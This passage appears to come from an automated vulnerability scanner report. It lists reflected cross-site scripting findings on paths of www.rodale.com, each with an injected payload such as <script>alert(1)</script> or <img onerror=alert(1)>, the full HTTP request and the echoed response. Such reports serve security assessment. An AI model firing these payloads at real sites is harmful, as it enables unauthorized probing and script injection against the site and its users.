Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:06:15 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:36:17 GMT
Date: Thu, 10 Mar 2011 17:06:17 GMT
Content-Length: 22452
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page plastic-free7c182"><a>fa0287626fe node node-958">
...[SNIP]...

2.191. http://www.rodale.com/plastic-free [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /plastic-free

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebe82"><script>alert(1)</script>fcfbf7dc765 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /plastic-free?ebe82"><script>alert(1)</script>fcfbf7dc765=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:06:13 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=0
Expires: Thu, 10 Mar 2011 17:06:15 GMT
Date: Thu, 10 Mar 2011 17:06:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SESS173207854f9299da8c63222b0f01afdd=a2j7f8qi6tbk6nmhjq9ofih142; path=/; domain=.rodale.com
Content-Length: 80333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="http://www.stumbleupon.com/submit?url=http://www.rodale.com/plastic-free?ebe82"><script>alert(1)</script>fcfbf7dc765=1&title=Rodale.com%27s+Plastic-Free+February">
...[SNIP]...

2.192. http://www.rodale.com/point-view [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /point-view

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2017e"><a>82d9802df73 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /point-view2017e"><a>82d9802df73 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:07:36 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:37:39 GMT
Date: Thu, 10 Mar 2011 17:07:39 GMT
Content-Length: 22446
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page point-view2017e"><a>82d9802df73 node node-958">
...[SNIP]...

2.193. http://www.rodale.com/point-view [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /point-view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 892bb"><a>2a73396ccd3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /point-view?892bb"><a>2a73396ccd3=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:06:45 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:36:48 GMT
Date: Thu, 10 Mar 2011 17:06:48 GMT
Content-Length: 31942
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="https://member.rodale.com/membercenter/mvc/createUser?site=rodalehealth&amp;returnUrl=http%3A%2F%2Fwww.rodale.com/point-view?892bb"><a>2a73396ccd3=1" title="Register" class="moreLink">
...[SNIP]...

2.194. http://www.rodale.com/recipe_query_redirect.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /recipe_query_redirect.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f024"><a>c58bbd69a17 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /recipe_query_redirect.php7f024"><a>c58bbd69a17 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:07:24 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:37:26 GMT
Date: Thu, 10 Mar 2011 17:07:26 GMT
Content-Length: 22491
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page recipe_query_redirect.php7f024"><a>c58bbd69a17 node node-958">
...[SNIP]...

2.195. http://www.rodale.com/rodale-story [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /rodale-story

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e61d"><a>0326caecab4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /rodale-story2e61d"><a>0326caecab4 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:07:15 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:37:18 GMT
Date: Thu, 10 Mar 2011 17:07:18 GMT
Content-Length: 22452
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page rodale-story2e61d"><a>0326caecab4 node node-958">
...[SNIP]...

2.196. http://www.rodale.com/rodale_coreg/post [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /rodale_coreg/post

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c3b1"><a>7dab2ceffb4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /rodale_coreg6c3b1"><a>7dab2ceffb4/post HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:07:26 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:37:28 GMT
Date: Thu, 10 Mar 2011 17:07:28 GMT
Content-Length: 22503
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page rodale_coreg6c3b1"><a>7dab2ceffb4 rodale_coreg6c3b1">
...[SNIP]...

2.197. http://www.rodale.com/rodale_coreg/post [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /rodale_coreg/post

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72b06"><a>65815bf57c9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /rodale_coreg/post72b06"><a>65815bf57c9 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:07:59 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:38:01 GMT
Date: Thu, 10 Mar 2011 17:08:01 GMT
Content-Length: 22482
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page rodale_coreg rodale_coreg-post72b06"><a>65815bf57c9 node node-958">
...[SNIP]...

2.198. http://www.rodale.com/rodalecom-team [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /rodalecom-team

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31adc"><a>8a1440e7f35 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /rodalecom-team31adc"><a>8a1440e7f35 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:07:45 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:37:46 GMT
Date: Thu, 10 Mar 2011 17:07:46 GMT
Content-Length: 22458
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page rodalecom-team31adc"><a>8a1440e7f35 node node-958">
...[SNIP]...

2.199. http://www.rodale.com/rodalecom-team [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /rodalecom-team

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d22ec"><a>9c968f0e2e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /rodalecom-team?d22ec"><a>9c968f0e2e2=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:06:54 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:36:56 GMT
Date: Thu, 10 Mar 2011 17:06:56 GMT
Content-Length: 29104
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="https://member.rodale.com/membercenter/mvc/createUser?site=rodalehealth&amp;returnUrl=http%3A%2F%2Fwww.rodale.com/rodalecom-team?d22ec"><a>9c968f0e2e2=1" title="Register" class="moreLink">
...[SNIP]...

2.200. http://www.rodale.com/rss-feeds [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /rss-feeds

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3dc0"><a>efe5f9be3e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /rss-feedsb3dc0"><a>efe5f9be3e1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:07:49 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1799
Expires: Thu, 10 Mar 2011 17:37:51 GMT
Date: Thu, 10 Mar 2011 17:07:52 GMT
Content-Length: 22443
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page rss-feedsb3dc0"><a>efe5f9be3e1 node node-958">
...[SNIP]...

2.201. http://www.rodale.com/rss-feeds [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /rss-feeds

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4c5e"><a>b65b7d6d1a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /rss-feeds?e4c5e"><a>b65b7d6d1a9=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:06:56 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:36:58 GMT
Date: Thu, 10 Mar 2011 17:06:58 GMT
Content-Length: 24643
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="https://member.rodale.com/membercenter/mvc/createUser?site=rodalehealth&amp;returnUrl=http%3A%2F%2Fwww.rodale.com/rss-feeds?e4c5e"><a>b65b7d6d1a9=1" title="Register" class="moreLink">
...[SNIP]...

2.202. http://www.rodale.com/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 837bc"><a>082b5ca454b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /rss.xml837bc"><a>082b5ca454b HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:05:04 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:35:04 GMT
Date: Thu, 10 Mar 2011 17:05:04 GMT
Content-Length: 22437
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page rss.xml837bc"><a>082b5ca454b node node-958">
...[SNIP]...

2.203. http://www.rodale.com/search/google_appliance [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /search/google_appliance

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70f00"><a>d72c0f053f0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /search70f00"><a>d72c0f053f0/google_appliance HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:06:49 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:36:51 GMT
Date: Thu, 10 Mar 2011 17:06:51 GMT
Content-Length: 22515
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page search70f00"><a>d72c0f053f0 search70f00">
...[SNIP]...

2.204. http://www.rodale.com/search/google_appliance [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /search/google_appliance

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 581c9"><script>alert(1)</script>0392f7bba55 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/google_appliance581c9"><script>alert(1)</script>0392f7bba55 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:07:28 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:37:29 GMT
Date: Thu, 10 Mar 2011 17:07:29 GMT
Content-Length: 21705
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="/search/google_appliance581c9"><script>alert(1)</script>0392f7bba55" class="filters dottedLine">
...[SNIP]...

2.205. http://www.rodale.com/search/google_appliance [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /search/google_appliance

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aee6e"><script>alert(1)</script>a003685982a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/google_appliance?aee6e"><script>alert(1)</script>a003685982a=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:06:47 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:36:48 GMT
Date: Thu, 10 Mar 2011 17:06:48 GMT
Content-Length: 21127
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="https://member.rodale.com/membercenter/mvc/createUser?site=rodalehealth&amp;returnUrl=http%3A%2F%2Fwww.rodale.com/search/google_appliance?aee6e"><script>alert(1)</script>a003685982a=1" title="Register" class="moreLink">
...[SNIP]...

2.206. http://www.rodale.com/search/google_appliance/BPA [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /search/google_appliance/BPA

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f982"><a>0a4677dd94e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /search8f982"><a>0a4677dd94e/google_appliance/BPA HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:06:34 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:36:36 GMT
Date: Thu, 10 Mar 2011 17:06:36 GMT
Content-Length: 22525
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page search8f982"><a>0a4677dd94e search8f982">
...[SNIP]...

2.207. http://www.rodale.com/search/google_appliance/BPA [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /search/google_appliance/BPA

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dcbbf'><img%20src%3da%20onerror%3dalert(1)>dc9cad8a6ab was submitted in the REST URL parameter 2. This input was echoed as dcbbf'><img src=a onerror=alert(1)>dc9cad8a6ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/google_appliancedcbbf'><img%20src%3da%20onerror%3dalert(1)>dc9cad8a6ab/BPA HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:07:25 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:37:26 GMT
Date: Thu, 10 Mar 2011 17:07:26 GMT
Content-Length: 22757
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href='/search/google_appliancedcbbf'><img src=a onerror=alert(1)>dc9cad8a6ab/BPA?filter=prevention.com'>
...[SNIP]...

